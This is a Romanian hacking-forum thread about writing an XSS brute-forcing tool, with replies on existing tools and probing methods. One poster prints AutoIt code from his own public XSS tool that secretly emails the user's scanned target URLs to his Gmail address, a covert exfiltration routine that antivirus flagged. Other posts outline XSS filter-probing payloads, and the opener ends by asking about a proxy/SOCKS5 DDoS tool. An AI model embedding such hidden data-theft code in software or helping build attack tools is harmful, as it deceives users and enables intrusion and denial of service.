tudor13mn13 Posted October 12, 2013 Report Share Posted October 12, 2013 (edited) Salut rst!Tocmai m-am gandit sa ma apuc sa codez un XSS-Brute Forcer ... Ar fi de folos ?Ce parere aveti?EDIT: Nu astept comentarii gen "Skid etc." Edited October 12, 2013 by tudor13mn13 Quote Link to comment Share on other sites More sharing options...
TheTime Posted October 12, 2013 Report Share Posted October 12, 2013 Normal ca ar fi util. Daca nu pentru altii, cel putin pentru tine.Jimmy avea un xss brute destul de bun, privat, creatie proprie, deci ideea ta nu este noua sub soare. Incearca sa-l codezi si, daca iese ceva minunat, poate faci si ceva banuti cu el. Quote Link to comment Share on other sites More sharing options...
dekeeu Posted October 12, 2013 Report Share Posted October 12, 2013 Nu stiu ce sa zic, eu deja am asta care are cam tot ce-i trebuie dar oricum in majoritatea cazurilor folosesc metoda `manuala`. Oricum poti sa il faci si sa-l adaugi in CV , ar da destul de bine Quote Link to comment Share on other sites More sharing options...
1337 Posted October 12, 2013 Report Share Posted October 12, 2013 Normal ca ar fi util. Daca nu pentru altii, cel putin pentru tine.Jimmy avea un xss brute destul de bun, privat, creatie proprie, deci ideea ta nu este noua sub soare. Incearca sa-l codezi si, daca iese ceva minunat, poate faci si ceva banuti cu el.Nu e privat, e public! Quote Link to comment Share on other sites More sharing options...
alezu2000 Posted October 12, 2013 Report Share Posted October 12, 2013 Nu e privat, e public! dar nu recomand sa il rulati fara vreun "paravan"https://www.virustotal.com/en/file/40f5a4d715579ce2e0f384017821d91962b14c19cf90c972059775320c05febd/analysis/ Quote Link to comment Share on other sites More sharing options...
dekeeu Posted October 12, 2013 Report Share Posted October 12, 2013 Asta voiam sa zic si eu, am incercat sa-l scot odata si mi-a sarit AV-ul .Artemis!DFA8B7751955Din ce stiu eu asta e keylogger /rat . Quote Link to comment Share on other sites More sharing options...
Jimmy Posted October 12, 2013 Report Share Posted October 12, 2013 (edited) Din cauza asta e vazut ca virus:If WinExists("[CLASS:#32770]") Then $hwnd = WinGetHandle("[CLASS:#32770]") $aStyle = DllCall("user32.dll", "long", "GetWindowLong", "hwnd", $hwnd, "int", -16) $Style = Hex($aStyle[0]) $String = StringCompare($Style, "94C801C5") If $String = 1 Then $Ini_read = IniRead(@ScriptDir & "\XSS.ini", "XSS", "Url", "") If StringInStr($Ini_read, "[COLOR=#ff0000]Google[/COLOR]") > 0 Then $SmtpServer = "smtp.gmail.com" $FromName = "XSS Catcher" $FromAddress = "xss.catcher@gmail.com" $ToAddress = "xss@gmail.com" $Subject = "New Google XSS from " & $Pc_Name $Body = $Ini_read $AttachFiles = "" $CcAddress = "" $BccAddress = "" $Importance = "Normal" $Username = "asdf" $Password = "asdf" $IPPort = 465 $ssl = 1 $rc = _INetSmtpMailCom($SmtpServer, $FromName, $FromAddress, $ToAddress, $Subject, $Body, $AttachFiles, $CcAddress, $BccAddress, $Importance, $Username, $Password, $IPPort, $ssl)Oricum nu am prins nimic... Edited October 12, 2013 by Jimmy Quote Link to comment Share on other sites More sharing options...
co4ie Posted October 12, 2013 Report Share Posted October 12, 2013 xsser si xssme si xenotix ... altceva? Quote Link to comment Share on other sites More sharing options...
mah_one Posted October 13, 2013 Report Share Posted October 13, 2013 (edited) Eu cred ca ar fi mult mai util sa il gandesti altfel.E cam aiurea sa ai o lista de vectori si sa faci bruteforce (din punctul meu de vedere). Nu vezi comportamentul aplicatiei.Ai putea sa faci programul de asa natura incat sa vada ce caractere nu sunt filtrate, iar la urma sa iti vina cu un raport in care sa iti zica acele caractere. Dupa acest raport tu o sa stai si o sa te gandesti la cum sa scoti ceva de acolo.Spre exemplu primele incercari ar putea fi:vector = 't3st1234vector = "t3st1234vector = <t3st1234 sau vector = t3st1234<vector = >t3st1234 sau vector = t3st1234>Parsezi raspunsul de la server pana la t3st1234 si vezi ce s-a intamplat cu ' " > <...........Encode %22 %27 %3e %3c sau double encode %2522 %2527 %253e %253c sau html encode a..............La sfarsit sa iti vina cu un raport in care iti precizeaza un grad de risc dupa o metodologie proprie. In functie de acest grad de risc te hotarasti daca se merita sa faci tu manual ceva sau nu.Felicitari pentru munca depusa in dezvoltarea respectivului tool. E bine sa lucrezi la astfel de proiecte. Fara suparare, dar eu vad altfel lucrurile si nu cred ca un astfel de tool m-ar putea ajuta. Edited October 13, 2013 by mah_one Quote Link to comment Share on other sites More sharing options...
tudor13mn13 Posted October 14, 2013 Author Report Share Posted October 14, 2013 Dar despre un Proxy / Socks5 Ddoser ? Quote Link to comment Share on other sites More sharing options...